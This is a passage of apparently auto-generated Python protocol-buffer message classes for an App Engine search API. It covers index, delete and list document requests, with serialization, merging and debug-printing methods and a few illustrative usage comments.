out.putVarInt32(self.document_[i].ByteSizePartial())
self.document_[i].OutputPartial(out)
if (self.has_freshness_):
out.putVarInt32(16)
out.putVarInt32(self.freshness_)
if (self.has_index_spec_):
out.putVarInt32(26)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_document().TryMerge(tmp)
continue
if tt == 16:
self.set_freshness(d.getVarInt32())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.document_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("document%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_freshness_: res+=prefix+("freshness: %s\n" % self.DebugFormatInt32(self.freshness_))
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdocument = 1
kfreshness = 2
kindex_spec = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "document",
2: "freshness",
3: "index_spec",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexDocumentParams'
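# Sketch of building IndexDocumentParams: document is a repeated Document
# message (filled in via the accessors document_pb defines on it), and
# index_spec is required.  Illustrative only:
#
#   params = IndexDocumentParams()
#   doc = params.add_document()             # returns a document_pb Document
#   params.mutable_index_spec().set_name('products')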
class IndexDocumentRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = IndexDocumentParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexDocumentRequest'
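# Sketch of a complete request round-trip.  Encode() is inherited from the
# ProtocolMessage base class (it is not defined in this file); app_id is
# optional, and note that its tag number is 3 (wire tag 26), not 2:
#
#   req = IndexDocumentRequest()
#   req.mutable_params().mutable_index_spec().set_name('products')
#   data = req.Encode()                     # serialized bytes
#   same = IndexDocumentRequest(data)       # constructor calls MergeFromString
#   assert req.Equals(same)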
class IndexDocumentResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.status_ = []
self.doc_id_ = []
if contents is not None: self.MergeFromString(contents)
def status_size(self): return len(self.status_)
def status_list(self): return self.status_
def status(self, i):
return self.status_[i]
def mutable_status(self, i):
return self.status_[i]
def add_status(self):
x = RequestStatus()
self.status_.append(x)
return x
def clear_status(self):
self.status_ = []
def doc_id_size(self): return len(self.doc_id_)
def doc_id_list(self): return self.doc_id_
def doc_id(self, i):
return self.doc_id_[i]
def set_doc_id(self, i, x):
self.doc_id_[i] = x
def add_doc_id(self, x):
self.doc_id_.append(x)
def clear_doc_id(self):
self.doc_id_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.status_size()): self.add_status().CopyFrom(x.status(i))
for i in xrange(x.doc_id_size()): self.add_doc_id(x.doc_id(i))
def Equals(self, x):
if x is self: return 1
if len(self.status_) != len(x.status_): return 0
for e1, e2 in zip(self.status_, x.status_):
if e1 != e2: return 0
if len(self.doc_id_) != len(x.doc_id_): return 0
for e1, e2 in zip(self.doc_id_, x.doc_id_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.status_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSize())
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSizePartial())
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
return n
def Clear(self):
self.clear_status()
self.clear_doc_id()
def OutputUnchecked(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSize())
self.status_[i].OutputUnchecked(out)
for i in xrange(len(self.doc_id_)):
out.putVarInt32(18)
out.putPrefixedString(self.doc_id_[i])
def OutputPartial(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSizePartial())
self.status_[i].OutputPartial(out)
for i in xrange(len(self.doc_id_)):
out.putVarInt32(18)
out.putPrefixedString(self.doc_id_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_status().TryMerge(tmp)
continue
if tt == 18:
self.add_doc_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.status_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("status%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.doc_id_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("doc_id%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kdoc_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "doc_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexDocumentResponse'
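# Sketch of reading an IndexDocumentResponse: repeated RequestStatus entries
# plus the doc_ids returned by the service.  Illustrative only:
#
#   for st in response.status_list():
#       ok = (st.code() == SearchServiceError.OK)
#   ids = response.doc_id_list()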
class DeleteDocumentParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
def __init__(self, contents=None):
self.doc_id_ = []
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def doc_id_size(self): return len(self.doc_id_)
def doc_id_list(self): return self.doc_id_
def doc_id(self, i):
return self.doc_id_[i]
def set_doc_id(self, i, x):
self.doc_id_[i] = x
def add_doc_id(self, x):
self.doc_id_.append(x)
def clear_doc_id(self):
self.doc_id_ = []
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.doc_id_size()): self.add_doc_id(x.doc_id(i))
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if len(self.doc_id_) != len(x.doc_id_): return 0
for e1, e2 in zip(self.doc_id_, x.doc_id_):
if e1 != e2: return 0
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_doc_id()
self.clear_index_spec()
def OutputUnchecked(self, out):
for i in xrange(len(self.doc_id_)):
out.putVarInt32(10)
out.putPrefixedString(self.doc_id_[i])
out.putVarInt32(18)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.doc_id_)):
out.putVarInt32(10)
out.putPrefixedString(self.doc_id_[i])
if (self.has_index_spec_):
out.putVarInt32(18)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_doc_id(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.doc_id_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("doc_id%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdoc_id = 1
kindex_spec = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "doc_id",
2: "index_spec",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteDocumentParams'
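# Sketch of DeleteDocumentParams: repeated doc_id strings plus the required
# index_spec identifying which index to delete from.  Names are illustrative:
#
#   params = DeleteDocumentParams()
#   params.add_doc_id('doc-1')
#   params.add_doc_id('doc-2')
#   params.mutable_index_spec().set_name('products')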
class DeleteDocumentRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = DeleteDocumentParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteDocumentRequest'
class DeleteDocumentResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.status_ = []
if contents is not None: self.MergeFromString(contents)
def status_size(self): return len(self.status_)
def status_list(self): return self.status_
def status(self, i):
return self.status_[i]
def mutable_status(self, i):
return self.status_[i]
def add_status(self):
x = RequestStatus()
self.status_.append(x)
return x
def clear_status(self):
self.status_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.status_size()): self.add_status().CopyFrom(x.status(i))
def Equals(self, x):
if x is self: return 1
if len(self.status_) != len(x.status_): return 0
for e1, e2 in zip(self.status_, x.status_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.status_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSize())
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSize())
self.status_[i].OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSizePartial())
self.status_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.status_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("status%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteDocumentResponse'
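# DeleteDocumentResponse mirrors IndexDocumentResponse minus the doc_ids: it
# carries only repeated RequestStatus entries describing the outcome of the
# delete operations.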
class ListDocumentsParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
has_start_doc_id_ = 0
start_doc_id_ = ""
has_include_start_doc_ = 0
include_start_doc_ = 1
has_limit_ = 0
limit_ = 100
has_keys_only_ = 0
keys_only_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def start_doc_id(self): return self.start_doc_id_
def set_start_doc_id(self, x):
self.has_start_doc_id_ = 1
self.start_doc_id_ = x
def clear_start_doc_id(self):
if self.has_start_doc_id_:
self.has_start_doc_id_ = 0
self.start_doc_id_ = ""
def has_start_doc_id(self): return self.has_start_doc_id_
def include_start_doc(self): return self.include_start_doc_
def set_include_start_doc(self, x):
self.has_include_start_doc_ = 1
self.include_start_doc_ = x
def clear_include_start_doc(self):
if self.has_include_start_doc_:
self.has_include_start_doc_ = 0
self.include_start_doc_ = 1
def has_include_start_doc(self): return self.has_include_start_doc_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 100
def has_limit(self): return self.has_limit_
def keys_only(self): return self.keys_only_
def set_keys_only(self, x):
self.has_keys_only_ = 1
self.keys_only_ = x
def clear_keys_only(self):
if self.has_keys_only_:
self.has_keys_only_ = 0
self.keys_only_ = 0
def has_keys_only(self): return self.has_keys_only_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
if (x.has_start_doc_id()): self.set_start_doc_id(x.start_doc_id())
if (x.has_include_start_doc()): self.set_include_start_doc(x.include_start_doc())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_keys_only()): self.set_keys_only(x.keys_only())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
if self.has_start_doc_id_ != x.has_start_doc_id_: return 0
if self.has_start_doc_id_ and self.start_doc_id_ != x.start_doc_id_: return 0
if self.has_include_start_doc_ != x.has_include_start_doc_: return 0
if self.has_include_start_doc_ and self.include_start_doc_ != x.include_start_doc_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_keys_only_ != x.has_keys_only_: return 0
if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
if (self.has_start_doc_id_): n += 1 + self.lengthString(len(self.start_doc_id_))
if (self.has_include_start_doc_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_keys_only_): n += 2
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
if (self.has_start_doc_id_): n += 1 + self.lengthString(len(self.start_doc_id_))
if (self.has_include_start_doc_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_keys_only_): n += 2
return n
def Clear(self):
self.clear_index_spec()
self.clear_start_doc_id()
self.clear_include_start_doc()
self.clear_limit()
self.clear_keys_only()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
if (self.has_start_doc_id_):
out.putVarInt32(18)
out.putPrefixedString(self.start_doc_id_)
if (self.has_include_start_doc_):
out.putVarInt32(24)
out.putBoolean(self.include_start_doc_)
if (self.has_limit_):
out.putVarInt32(32)
out.putVarInt32(self.limit_)
if (self.has_keys_only_):
out.putVarInt32(40)
out.putBoolean(self.keys_only_)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
if (self.has_start_doc_id_):
out.putVarInt32(18)
out.putPrefixedString(self.start_doc_id_)
if (self.has_include_start_doc_):
out.putVarInt32(24)
out.putBoolean(self.include_start_doc_)
if (self.has_limit_):
out.putVarInt32(32)
out.putVarInt32(self.limit_)
if (self.has_keys_only_):
out.putVarInt32(40)
out.putBoolean(self.keys_only_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if tt == 18:
self.set_start_doc_id(d.getPrefixedString())
continue
if tt == 24:
self.set_include_start_doc(d.getBoolean())
continue
if tt == 32:
self.set_limit(d.getVarInt32())
continue
if tt == 40:
self.set_keys_only(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_start_doc_id_: res+=prefix+("start_doc_id: %s\n" % self.DebugFormatString(self.start_doc_id_))
if self.has_include_start_doc_: res+=prefix+("include_start_doc: %s\n" % self.DebugFormatBool(self.include_start_doc_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
kstart_doc_id = 2
kinclude_start_doc = 3
klimit = 4
kkeys_only = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
2: "start_doc_id",
3: "include_start_doc",
4: "limit",
5: "keys_only",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListDocumentsParams'
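# Sketch of ListDocumentsParams.  Note the class-level defaults above:
# include_start_doc defaults to 1 (true) and limit defaults to 100.  Values
# here are illustrative:
#
#   params = ListDocumentsParams()
#   params.mutable_index_spec().set_name('products')
#   params.set_start_doc_id('doc-100')
#   params.set_keys_only(1)
#   params.set_limit(50)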
class ListDocumentsRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = ListDocumentsParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 18:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
